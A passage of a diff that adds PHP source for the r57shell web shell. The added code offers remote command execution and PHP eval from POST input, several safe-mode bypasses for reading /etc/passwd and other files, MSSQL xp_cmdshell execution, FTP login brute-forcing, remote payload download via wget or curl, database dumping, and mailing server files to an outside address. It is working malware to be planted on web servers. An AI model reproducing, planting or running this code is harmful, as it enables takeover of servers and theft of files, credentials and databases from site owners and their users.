> ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); 
+ if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! 
Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." 
-X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! 
Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text777'].up_down('id3').$table_up2.div('id3').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text888'].$arrow."</b>",in('text','u1p',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text7777'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text8888'].$arrow."</b>",in('text','Mohajer22',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text999'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text9999'].$arrow."</b>","<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','string',60,(($_POST['string'])?($_POST['string']):("/etc/passwd"))).ws(2)."<b>".in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text1010'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text101010'].$arrow."</b>","<select name=plugin><option>cat /etc/passwd</option><option>/bin/ls</option><option>tempnam</option><option>/tmp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):(""))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; + +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' 
zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo 
sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." 
( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo 
sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' 
